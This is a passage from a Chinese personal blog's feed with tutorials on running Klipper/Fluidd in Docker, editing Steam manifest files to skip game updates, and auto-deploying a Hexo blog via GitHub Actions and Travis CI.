class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">version:</span> <span class="string">'3.4'</span></span><br><span class="line"></span><br><span class="line"><span class="attr">services:</span></span><br><span class="line"> <span class="attr">klipper:</span></span><br><span class="line"> <span class="attr">image:</span> <span class="string">dimalo/klipper-moonraker</span></span><br><span class="line"> <span class="attr">container_name:</span> <span class="string">klipper</span></span><br><span class="line"> <span class="attr">ports:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="number">7125</span><span class="string">:7125</span></span><br><span class="line"> <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line"> <span class="attr">volumes:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">gcode_files:/home/klippy/gcode_files</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">klipper_data:/home/klippy/.config</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">moonraker_data:/home/klippy/.moonraker</span></span><br><span class="line"> <span class="attr">devices:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">/dev/serial/by-id/usb-1a86_USB_Serial-if00-port0:/dev/ttyUSB0</span> <span class="comment">#根据实际情况更改</span></span><br><span class="line"></span><br><span class="line"> <span class="attr">fluidd:</span></span><br><span class="line"> <span class="attr">image:</span> <span class="string">dimalo/fluidd</span></span><br><span class="line"> <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line"> <span class="attr">container_name:</span> <span class="string">fluidd</span></span><br><span class="line"> <span class="attr">ports:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="number">8010</span><span class="string">:80</span></span><br><span class="line"> <span class="attr">depends_on:</span> </span><br><span class="line"> <span class="bullet">-</span> <span class="string">klipper</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">klipper:klipper</span></span><br><span class="line"></span><br><span class="line"><span class="attr">volumes:</span> </span><br><span class="line"> <span class="attr">gcode_files:</span></span><br><span class="line"> <span class="attr">moonraker_data:</span></span><br><span class="line"> <span class="attr">klipper_data:</span></span><br></pre></td></tr></table></figure><p>访问 <code>http://{IP}:8010</code> 即可看到fluidd</p><h1 id="常见问题"><a href="#常见问题" class="headerlink" title="常见问题"></a>常见问题</h1><p><code>1.fluidd显示无法连接...</code></p><p>该镜像自带了启动时检查更新,查看Container <code>klipper</code> 的日志可以看到启动卡在了git pull上,等一段时间或者自行解决。</p><p><code>2.无法在网页重启klipper</code></p><p>应直接重启对应Container</p><p><code>3.上传文件名可以为中文,但是打印时必须换成英文</code></p>]]></content>
<summary type="html"><h1 id="安装Portainer"><a href="#安装Portainer" class="headerlink" title="安装Portainer"></a>安装Portainer</h1><p><a href="https://docs.portainer.io</summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>如何优雅的跳过/禁止Steam更新你的游戏</title>
<link href="https://thinkalone.win/skip-steam-update.html"/>
<id>https://thinkalone.win/skip-steam-update.html</id>
<published>2021-01-22T13:00:00.000Z</published>
<updated>2021-01-22T13:00:00.000Z</updated>
<content type="html"><![CDATA[<p><img src="/pictures/skip-steam-update/head.png" alt="head"></p><p>买了个Beatsaber, 每次Steam更新游戏都会让自己装的插件失效,而不更新又没法启动游戏……</p><span id="more"></span><h2 id="1-关闭自动更新"><a href="#1-关闭自动更新" class="headerlink" title="1.关闭自动更新"></a>1.关闭自动更新</h2><p>这个应该不用说了,防止被Steam抢先更掉。</p><pre><code>在Steam中 游戏 -》 右键属性 -》 更新 -》 自动更新 -》 只在我启动时更新此游戏</code></pre><h2 id="2-找到游戏对应的acf文件"><a href="#2-找到游戏对应的acf文件" class="headerlink" title="2.找到游戏对应的acf文件"></a>2.找到游戏对应的acf文件</h2><p>在Steam商店找到你的游戏,复制URL<code>/app/</code>后的一串数字,这是游戏的<code>appid</code>。</p><p><img src="/pictures/skip-steam-update/findfile.png" alt="findfile"></p><p>直接用文件管理器搜索<code>appid</code>,找到扩展名为acf的文件,以我要修改的Beatsaber为例:</p><p>然后用你喜欢的文本编辑器打开acf文件</p><h2 id="3-在Steamdb找数据"><a href="#3-在Steamdb找数据" class="headerlink" title="3.在Steamdb找数据"></a>3.在Steamdb找数据</h2><p>打开 <a href="https://steamdb.info/">Steamdb</a> ,把<code>appid</code>粘贴进去。</p><p><img src="/pictures/skip-steam-update/search.png" alt="search"></p><p>打开<code>History</code>标签</p><p><img src="/pictures/skip-steam-update/history.png" alt="history"></p><p>找到<code>timeupdated</code> <code>buildid</code> <code>maxsize</code> <code>manifests</code>,并记下绿色高亮的数值。</p><p><img src="/pictures/skip-steam-update/changelist.png" alt="changelist"></p><h2 id="4-修改acf文件"><a href="#4-修改acf文件" class="headerlink" title="4.修改acf文件"></a>4.修改acf文件</h2><h3 id="修改前要先完全关闭steam"><a href="#修改前要先完全关闭steam" class="headerlink" title="修改前要先完全关闭steam"></a>修改前要先完全关闭steam</h3><p><img src="/pictures/skip-steam-update/modify.png" alt="modify"></p><p>将<code>StateFlags</code>改为<code>4</code>,然后将上面复制的值一一对应覆盖原来的值。</p><pre><code>timeupdated -> LastUpdatedbuildid -> buildidmanifests -> manifestmaxsize -> size</code></pre><p>保存后再启动steam,完成</p>]]></content>
<summary type="html"><p><img src="/pictures/skip-steam-update/head.png" alt="head"></p>
<p>买了个Beatsaber, 每次Steam更新游戏都会让自己装的插件失效,而不更新又没法启动游戏……</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
</entry>
<entry>
<title>使用 GitHub Actions 自动部署Hexo</title>
<link href="https://thinkalone.win/hexo-on-action.html"/>
<id>https://thinkalone.win/hexo-on-action.html</id>
<published>2020-12-26T13:00:00.000Z</published>
<updated>2020-12-26T13:00:00.000Z</updated>
<content type="html"><![CDATA[<p><img src="/pictures/hexo-on-action/head.png"></p><p>2019年时给博客配置了Travis CI 自动构建,然后前几天准备发个文章,写完反手一个<code>git push</code>博客就崩了。</p><span id="more"></span><h2 id="Hexo"><a href="#Hexo" class="headerlink" title="Hexo"></a>Hexo</h2><p>首先你的Hexo必须是已经在本地环境下配置好的,能正常运行<code>hexo g</code>。</p><h2 id="生成-配置秘钥"><a href="#生成-配置秘钥" class="headerlink" title="生成&配置秘钥"></a>生成&配置秘钥</h2><p>使用<code>ssh-keygen</code>生成一对秘钥</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t ed25519 -C "Hexo Deploy Key" -f github-deploy-key</span><br></pre></td></tr></table></figure><p>直接回车,不要设置密码</p><p>在 GitHub 上打开<code>仓库-> Settings -> Secrets</code>添加一个Secrets,<code>Name</code>填<code>HEXO_DEPLOY_KEY</code>,<code>Value</code>把上面生成的<strong>私钥</strong>粘贴进去</p><p><img src="/pictures/hexo-on-action/new.png"></p><p><img src="/pictures/hexo-on-action/new-ok.png"></p><p>打开<code>仓库-> Settings -> Deploy keys</code>添加一个Key,<code>Title</code>填<code>HEXO_DEPLOY_PUB</code>,<code>Key</code>把上面生成的<strong>公钥</strong>粘贴进去,勾选下面的<code>Allow write access</code></p><p><img src="/pictures/hexo-on-action/new-key.png"></p><h2 id="准备文件"><a href="#准备文件" class="headerlink" title="准备文件"></a>准备文件</h2><p>创建一个空的分支,从原有的hexo源文件目录下拷贝这些文件&文件夹:</p><ul><li><input checked="" disabled="" type="checkbox"> scaffolds</li><li><input checked="" disabled="" type="checkbox"> source</li><li><input checked="" disabled="" type="checkbox"> themes</li><li><input checked="" disabled="" type="checkbox"> _config.yml(hexo的)</li><li><input checked="" disabled="" type="checkbox"> package.json</li></ul><h2 id="修改配置文件"><a href="#修改配置文件" class="headerlink" title="修改配置文件"></a>修改配置文件</h2><p>为了防止以后由于长时间未维护,主题或hexo更新导致的博客炸掉,所以配置主题为submodule。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git submodule add https://github.com/JoeyBling/hexo-theme-yilia-plus themes/yilia</span><br></pre></td></tr></table></figure><p>在_config.yml的最后添加一项<code>theme_config:</code></p><p>参考:<a href="https://blog.xxwhite.com/2020/blog-ci.html#%E4%B8%BB%E9%A2%98%E5%AD%90%E6%A8%A1%E5%9D%97%E5%8C%96">https://blog.xxwhite.com/2020/blog-ci.html#%E4%B8%BB%E9%A2%98%E5%AD%90%E6%A8%A1%E5%9D%97%E5%8C%96</a></p><p><img src="/pictures/hexo-on-action/config.png"></p><h2 id="配置Workflow"><a href="#配置Workflow" class="headerlink" title="配置Workflow"></a>配置Workflow</h2><p>创建一个新文件:<code>.github/workflows/deploy.yml</code></p><figure class="highlight yaml"><figcaption><span>.github/workflows/deploy.yml</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">Hexo</span> <span class="string">Deploy</span></span><br><span class="line"></span><br><span class="line"><span class="attr">on:</span></span><br><span class="line"> <span class="attr">push:</span></span><br><span class="line"> <span class="attr">branches:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">source</span> <span class="comment">#被监控的分支,当这个分支有改动时触发</span></span><br><span class="line"></span><br><span class="line"><span class="attr">jobs:</span></span><br><span class="line"> <span class="attr">build:</span></span><br><span class="line"> <span class="attr">runs-on:</span> <span class="string">ubuntu-18.04</span></span><br><span class="line"> <span class="attr">if:</span> <span class="string">github.event.repository.owner.id</span> <span class="string">==</span> <span class="string">github.event.sender.id</span></span><br><span class="line"></span><br><span class="line"> <span class="attr">steps:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Checkout</span> <span class="string">source</span></span><br><span class="line"> <span class="attr">uses:</span> <span class="string">actions/checkout@v2</span></span><br><span class="line"> <span class="attr">with:</span></span><br><span class="line"> <span class="attr">ref:</span> <span class="string">source</span> <span class="comment">#hexo源文件所在的分支</span></span><br><span class="line"></span><br><span class="line"> <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Setup</span> <span class="string">Node.js</span></span><br><span class="line"> <span class="attr">uses:</span> <span class="string">actions/setup-node@v1</span></span><br><span class="line"> <span class="attr">with:</span></span><br><span class="line"> <span class="attr">node-version:</span> <span class="string">'12'</span></span><br><span class="line"></span><br><span class="line"> <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Setup</span> <span class="string">Hexo</span></span><br><span class="line"> <span class="attr">env:</span></span><br><span class="line"> <span class="attr">ACTION_DEPLOY_KEY:</span> <span class="string">$</span></span><br><span class="line"> <span class="attr">run:</span> <span class="string">|</span></span><br><span class="line"><span class="string"> mkdir -p ~/.ssh/</span></span><br><span class="line"><span class="string"> echo "$ACTION_DEPLOY_KEY" > ~/.ssh/id_ed25519</span></span><br><span class="line"><span class="string"> chmod 700 ~/.ssh</span></span><br><span class="line"><span class="string"> chmod 600 ~/.ssh/id_ed25519</span></span><br><span class="line"><span class="string"> ssh-keyscan github.com >> ~/.ssh/known_hosts</span></span><br><span class="line"><span class="string"> git config --global user.email "disappear9@outlook.com" #设置git提交时的Email</span></span><br><span class="line"><span class="string"> git config --global user.name "Disappear9" #设置git提交时的用户名</span></span><br><span class="line"><span class="string"> npm install hexo-cli -g</span></span><br><span class="line"><span class="string"> npm install</span></span><br><span class="line"><span class="string"> git submodule update --init --recursive #拉取submodule</span></span><br><span class="line"><span class="string"> rm themes/yilia/_config.yml #删除主题自带的配置文件</span></span><br><span class="line"><span class="string"> chmod +x deploy.sh</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"> <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">Deploy</span></span><br><span class="line"> <span class="attr">run:</span> <span class="string">|</span></span><br><span class="line"><span class="string"> hexo g</span></span><br><span class="line"><span class="string"> ./deploy.sh</span></span><br></pre></td></tr></table></figure><p>由于使用<code>hexo d</code>部署会让git的commit看起来很丑,所以把部署写进脚本<code>deploy.sh</code>(放在新建分支的根目录下)</p><figure class="highlight bash"><figcaption><span>deploy.sh</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">set</span> -ev</span><br><span class="line"><span class="built_in">export</span> TZ=<span class="string">'Asia/Shanghai'</span></span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> --depth=1 -b master git@github.com:{用户名}/{仓库}.git .deploy_git <span class="comment">#自己替换</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> .deploy_git</span><br><span class="line">git checkout master</span><br><span class="line"><span class="built_in">mv</span> .git/ ../public/</span><br><span class="line"><span class="built_in">cd</span> ../public</span><br><span class="line"></span><br><span class="line">git add .</span><br><span class="line">git commit -m <span class="string">"Site updated: `date +"</span>%Y-%m-%d %H:%M:%S<span class="string">"`"</span></span><br><span class="line">git push origin master:master --force </span><br></pre></td></tr></table></figure><h2 id="加个Badge"><a href="#加个Badge" class="headerlink" title="加个Badge"></a>加个Badge</h2><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source"><img src="https://github.com/Disappear9/disappear9.github.io/workflows/Hexo%20Deploy/badge.svg" alt="Build Status"></a></p><p>参考:<a href="https://docs.github.com/cn/actions/managing-workflow-runs/adding-a-workflow-status-badge">https://docs.github.com/cn/actions/managing-workflow-runs/adding-a-workflow-status-badge</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/<OWNER>/<REPOSITORY>/workflows/Hexo%20Deploy/badge.svg</span><br></pre></td></tr></table></figure><h2 id="完"><a href="#完" class="headerlink" title="完"></a>完</h2><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source">https://github.com/Disappear9/disappear9.github.io/tree/source</a><br>欢迎参考</p>]]></content>
<summary type="html"><p><img src="/pictures/hexo-on-action/head.png"></p>
<p>2019年时给博客配置了Travis CI 自动构建,然后前几天准备发个文章,写完反手一个<code>git push</code>博客就崩了。</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>使用 Travis CI 自动构建 Hexo 博客</title>
<link href="https://thinkalone.win/Travis-CI-Hexo.html"/>
<id>https://thinkalone.win/Travis-CI-Hexo.html</id>
<published>2019-02-06T04:44:30.000Z</published>
<updated>2019-02-06T04:44:30.000Z</updated>
<content type="html"><![CDATA[<h2 id="配置-GitHub-仓库"><a href="#配置-GitHub-仓库" class="headerlink" title="配置 GitHub 仓库"></a>配置 GitHub 仓库</h2><p><strong>注意:以下全部操作尽量不要在Windows系统下操作</strong><br>建立一个source分支,放入<code>scaffolds</code> <code>source</code> <code>themes</code>文件夹和<code>_config.yml</code> <code>package.json</code>文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mkdir source</span><br><span class="line">cd source</span><br><span class="line">git init</span><br><span class="line">git remote add origin git@github.com:Disappear9/disappear9.github.io.git</span><br><span class="line">git checkout --orphan source</span><br><span class="line">git add .</span><br><span class="line">git commit -m "Initial commit"</span><br><span class="line">git push origin source:source</span><br></pre></td></tr></table></figure><p>创建 <code>.travis.yml</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">language: node_js</span><br><span class="line">node_js: stable</span><br></pre></td></tr></table></figure><h2 id="配置-Travis-CI"><a href="#配置-Travis-CI" class="headerlink" title="配置 Travis CI"></a>配置 Travis CI</h2><p>用Github登录并且关联项目</p><h3 id="配置Deploy-keys"><a href="#配置Deploy-keys" class="headerlink" title="配置Deploy keys"></a>配置Deploy keys</h3><p>让Travis CI可以push到你的仓库</p><span id="more"></span><p>生成一个 ssh 密钥对:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-keygen -t ed25519 -f travis.key</span><br></pre></td></tr></table></figure><p>把travis.key.pub中的内容粘贴到Deploy keys<br><img src="/pictures/Travis-CI-HEXO/Deploykeys.png"></p><h3 id="加密私匙"><a href="#加密私匙" class="headerlink" title="加密私匙"></a>加密私匙</h3><p>总不能把私匙直接放项目里把?<br><strong>下面第一个坑来了:</strong><br>我们需要安装 Travis 的命令行工具</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt install ruby</span><br><span class="line">$ sudo gem install travis</span><br></pre></td></tr></table></figure><p><strong>瞬间报错</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ERROR: Error installing ffi:</span><br><span class="line"> ERROR: Failed to build gem native extension.</span><br></pre></td></tr></table></figure><p>Google了一圈,缺依赖,安上:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install ruby-dev curl</span><br></pre></td></tr></table></figure><p>好了,能正常运行了<br>登录 Travis 并加密文件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 如果是私有项目要加 --pro 参数</span><br><span class="line">$ travis login --auto</span><br><span class="line"># 加密完成后会在当前目录下生成 travis.key.enc 文件</span><br><span class="line">$ travis encrypt-file travis.key -add</span><br></pre></td></tr></table></figure><p>如果使用Windows系统,到这一步就会各种报错,官方甚至直接把这条<a href="https://docs.travis-ci.com/user/encrypting-files/#caveat">写进了文档</a>,说明不要在Windows系统下操作</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Caveat #</span><br><span class="line">There is a report of this function not working on a local Windows machine. Please use the WSL (Windows Subsystem for Linux) or a Linux or macOS machine</span><br></pre></td></tr></table></figure><p>加密完成后把travis.key.enc放进travis文件夹,查看.travis.yml会发现多了这样一行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl aes-256-cbc -K $encrypted_************_key -iv $encrypted_************_iv </span><br><span class="line"> -in .travis/travis.key.enc -out ~/.ssh/id_rsa -d</span><br></pre></td></tr></table></figure><p>其中的<code>$encrypted_************_key</code>和<code>iv</code>应该会被自动添加到Travis的环境变量<br>然而在我这里并没有</p><p><strong>然后就是第二个坑</strong><br>你需要在运行<code>$ travis encrypt-file travis.key -add</code>时加上 –debug参数,这样工具就会打印出API日志,其中value长度为32位的是iv,更长的是key,然后手动把他们加入到Travis的环境变量(添加的时候不要把前面的$符号打进去,不然又是报错)(手贱这一下我调了半天没找到错误在那……)</p><h2 id="编写-travis-yml"><a href="#编写-travis-yml" class="headerlink" title="编写 .travis.yml"></a>编写 .travis.yml</h2><figure class="highlight yaml"><figcaption><span>.travis.yml</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">language:</span> <span class="string">node_js</span></span><br><span class="line"><span class="attr">node_js:</span> <span class="string">stable</span></span><br><span class="line"><span class="attr">branches:</span></span><br><span class="line"> <span class="attr">only:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">source</span></span><br><span class="line"></span><br><span class="line"><span class="attr">cache:</span></span><br><span class="line"> <span class="attr">yarn:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">directories:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">node_modules</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">themes</span></span><br><span class="line"><span class="comment"># 添加github.com为信任主机,不然git push会失败</span></span><br><span class="line"><span class="attr">addons:</span></span><br><span class="line"> <span class="attr">ssh_known_hosts:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">github.com</span></span><br><span class="line"></span><br><span class="line"><span class="attr">before_install:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">openssl</span> <span class="string">aes-256-cbc</span> <span class="string">-K</span> <span class="string">$encrypted_************_key</span> <span class="string">-iv</span> <span class="string">$encrypted_************_iv</span> <span class="string">-in</span> <span class="string">travis/travis.key.enc</span> <span class="string">-out</span> <span class="string">~/.ssh/id_ed25519</span> <span class="string">-d</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">chmod</span> <span class="number">600</span> <span class="string">~/.ssh/id_ed25519</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">git</span> <span class="string">config</span> <span class="string">--global</span> <span class="string">user.name</span> <span class="string">"Disappear9"</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">git</span> <span class="string">config</span> <span class="string">--global</span> <span class="string">user.email</span> <span class="string">"disappear9@outlook.com"</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">chmod</span> <span class="string">+x</span> <span class="string">travis/deploy.sh</span></span><br><span class="line"></span><br><span class="line"><span class="attr">install:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">yarn</span></span><br><span class="line"></span><br><span class="line"><span class="attr">script:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">hexo</span> <span class="string">clean</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">hexo</span> <span class="string">generate</span></span><br><span class="line"><span class="comment"># 用deploy.sh来git commit + git push</span></span><br><span class="line"><span class="attr">after_success:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">travis/deploy.sh</span></span><br></pre></td></tr></table></figure><p>deploy.sh(放进travis文件夹)</p><figure class="highlight bash"><figcaption><span>deploy.sh</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">set</span> -ev</span><br><span class="line"><span class="built_in">export</span> TZ=<span class="string">'Asia/Shanghai'</span></span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> --depth=1 -b master git@github.com:Disappear9/disappear9.github.io.git .deploy_git</span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> .deploy_git</span><br><span class="line">git checkout master</span><br><span class="line"><span class="built_in">mv</span> .git/ ../public/</span><br><span class="line"><span class="built_in">cd</span> ../public</span><br><span class="line"></span><br><span class="line">git add .</span><br><span class="line">git commit -m <span class="string">"Site updated: `date +"</span>%Y-%m-%d %H:%M:%S<span class="string">"`"</span></span><br><span class="line">git push origin master:master --force</span><br></pre></td></tr></table></figure><p>上面这些步骤做完后你的目录看起来应该是这样的<br><img src="/pictures/Travis-CI-HEXO/finish.png"></p><p><a href="https://github.com/Disappear9/disappear9.github.io/tree/source">https://github.com/Disappear9/disappear9.github.io/tree/source</a><br>欢迎参考</p><p>完成后<code>git push origin source:source</code> 这样Travis ci就会开始构建了</p><h2 id="参考链接:"><a href="#参考链接:" class="headerlink" title="参考链接:"></a>参考链接:</h2><p><a href="https://blessing.studio/deploy-hexo-blog-automatically-with-travis-ci/">https://blessing.studio/deploy-hexo-blog-automatically-with-travis-ci/</a><br><a href="https://segmentfault.com/a/1190000013286548">https://segmentfault.com/a/1190000013286548</a></p>]]></content>
<summary type="html"><h2 id="配置-GitHub-仓库"><a href="#配置-GitHub-仓库" class="headerlink" title="配置 GitHub 仓库"></a>配置 GitHub 仓库</h2><p><strong>注意:以下全部操作尽量不要在Windows系统下操作</strong><br>建立一个source分支,放入<code>scaffolds</code> <code>source</code> <code>themes</code>文件夹和<code>_config.yml</code> <code>package.json</code>文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mkdir source</span><br><span class="line">cd source</span><br><span class="line">git init</span><br><span class="line">git remote add origin git@github.com:Disappear9/disappear9.github.io.git</span><br><span class="line">git checkout --orphan source</span><br><span class="line">git add .</span><br><span class="line">git commit -m &quot;Initial commit&quot;</span><br><span class="line">git push origin source:source</span><br></pre></td></tr></table></figure>
<p>创建 <code>.travis.yml</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">language: node_js</span><br><span class="line">node_js: stable</span><br></pre></td></tr></table></figure>
<h2 id="配置-Travis-CI"><a href="#配置-Travis-CI" class="headerlink" title="配置 Travis CI"></a>配置 Travis CI</h2><p>用Github登录并且关联项目</p>
<h3 id="配置Deploy-keys"><a href="#配置Deploy-keys" class="headerlink" title="配置Deploy keys"></a>配置Deploy keys</h3><p>让Travis CI可以push到你的仓库</p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>使DockerHub的Autobuild自动构建ARM/其他 架构的镜像</title>
<link href="https://thinkalone.win/Docker-ARM.html"/>
<id>https://thinkalone.win/Docker-ARM.html</id>
<published>2018-12-12T05:37:46.000Z</published>
<updated>2018-12-12T05:37:46.000Z</updated>
